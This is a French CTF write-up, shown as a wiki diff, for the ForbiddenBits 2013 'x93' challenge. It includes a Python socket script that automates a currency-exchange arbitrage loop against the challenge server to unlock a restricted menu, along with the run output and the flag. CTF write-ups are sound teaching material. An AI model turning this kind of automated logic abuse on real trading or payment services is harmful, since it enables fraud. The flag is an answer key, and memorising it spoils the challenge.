Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
— |
forbiddenbits_2013_x93 [2017/04/09 15:33] (Version actuelle) |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | ===== x93 (350) ===== | ||
+ | <code>i wanna access the restricted area | ||
+ | 95.170.83.28:3003</code> | ||
+ | ==== Overview ==== | ||
+ | On se connecte à un service où il est possible de faire des échanges de monnaie (d'une monnaie à une autre). | ||
+ | Qui dit échanges, dit taux. | ||
+ | Passer d'une monnaie à une autre puis faire le chemin inverse revient à perdre ou à gagner de l'argent ! | ||
+ | |||
+ | Le but ici va être de récupérer $5000 à partir de $100, 100€ et 100£. | ||
+ | |||
+ | ==== Solution ==== | ||
+ | J'ai choisie de jouer avec les € et les £ pour ensuite convertir les € en $. | ||
+ | |||
+ | <code>€ => £ | ||
+ | £ => € | ||
+ | ... | ||
+ | € => $</code> | ||
+ | |||
+ | <code python>import socket | ||
+ | |||
+ | def msg(data): | ||
+ | return data + "\n" | ||
+ | |||
+ | def parseamount(buffer): | ||
+ | splt = buffer.split(' , ') | ||
+ | usd = splt[0][17:-4] | ||
+ | eur = splt[1][:-4] | ||
+ | gbp = splt[2][:-9] | ||
+ | return (usd, eur, gbp) | ||
+ | |||
+ | def main(): | ||
+ | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
+ | sock.connect(('95.170.83.28', 3003)) | ||
+ | |||
+ | USD = 100 | ||
+ | EUR = 100 | ||
+ | GBP = 100 | ||
+ | |||
+ | sock.recv(512) # welcome message | ||
+ | sock.recv(512) # wanna trade? | ||
+ | sock.send(msg('yes')) # YES! | ||
+ | sock.recv(512) # username? | ||
+ | sock.send(msg('Xartrick')) # here! | ||
+ | sock.recv(512) # Thanks! | ||
+ | |||
+ | while 1: | ||
+ | # GBP to EUR | ||
+ | sock.recv(512) # get menu | ||
+ | sock.send(msg('2')) # exchange | ||
+ | sock.recv(512) # destination? | ||
+ | sock.send(msg('EUR')) # EUR! | ||
+ | sock.recv(512) # source? | ||
+ | sock.send(msg('GBP')) # GBP! | ||
+ | sock.recv(512) # amount? | ||
+ | sock.send(msg(str(GBP))) # GBP value | ||
+ | buffer = sock.recv(512) # get current values | ||
+ | (USD, EUR, GBP) = parseamount(buffer) | ||
+ | print 'EUR =>', EUR | ||
+ | |||
+ | if float(EUR) > 5000.0: | ||
+ | break | ||
+ | |||
+ | # EUR to GBP | ||
+ | sock.recv(512) # get menu | ||
+ | sock.send(msg('2')) # exchange | ||
+ | sock.recv(512) # destination? | ||
+ | sock.send(msg('GBP')) # GBP! | ||
+ | sock.recv(512) # source? | ||
+ | sock.send(msg('EUR')) # EUR! | ||
+ | sock.recv(512) # amount? | ||
+ | sock.send(msg(str(EUR))) # EUR value | ||
+ | buffer = sock.recv(512) # get current values | ||
+ | (USD, EUR, GBP) = parseamount(buffer) | ||
+ | print 'GBP =>', GBP | ||
+ | |||
+ | # EUR to USD | ||
+ | sock.recv(512) # get menu | ||
+ | sock.send(msg('2')) # exchange | ||
+ | sock.recv(512) # destination? | ||
+ | sock.send(msg('USD')) # USD! | ||
+ | sock.recv(512) # source? | ||
+ | sock.send(msg('EUR')) # EUR! | ||
+ | sock.recv(512) # amount? | ||
+ | sock.send(msg(str(EUR))) # EUR value | ||
+ | buffer = sock.recv(512) # get current values | ||
+ | (USD, EUR, GBP) = parseamount(buffer) | ||
+ | |||
+ | print 'USD =>', USD | ||
+ | |||
+ | |||
+ | sock.recv(512) # get menu | ||
+ | sock.send(msg('4')) # restricted area | ||
+ | buffer = sock.recv(512) | ||
+ | print buffer | ||
+ | |||
+ | sock.close() | ||
+ | |||
+ | main()</code> | ||
+ | |||
+ | <code>C:\CTF\FBCTF\x93>script.py | ||
+ | EUR => 253.85 | ||
+ | GBP => 218.31 | ||
+ | EUR => 335.86 | ||
+ | GBP => 288.84 | ||
+ | EUR => 444.37 | ||
+ | GBP => 382.16 | ||
+ | EUR => 587.94 | ||
+ | GBP => 505.63 | ||
+ | EUR => 777.89 | ||
+ | GBP => 668.99 | ||
+ | EUR => 1029.22 | ||
+ | GBP => 885.13 | ||
+ | EUR => 1361.74 | ||
+ | GBP => 1171.1 | ||
+ | EUR => 1801.69 | ||
+ | GBP => 1549.45 | ||
+ | EUR => 2383.77 | ||
+ | GBP => 2050.04 | ||
+ | EUR => 3153.91 | ||
+ | GBP => 2712.36 | ||
+ | EUR => 4172.86 | ||
+ | GBP => 3588.66 | ||
+ | EUR => 5521.02 | ||
+ | |||
+ | USD => 6062.7 | ||
+ | |||
+ | FLAG{7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0}</code> | ||
+ | |||
+ | ==== Flag ==== | ||
+ | <code>7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0</code> |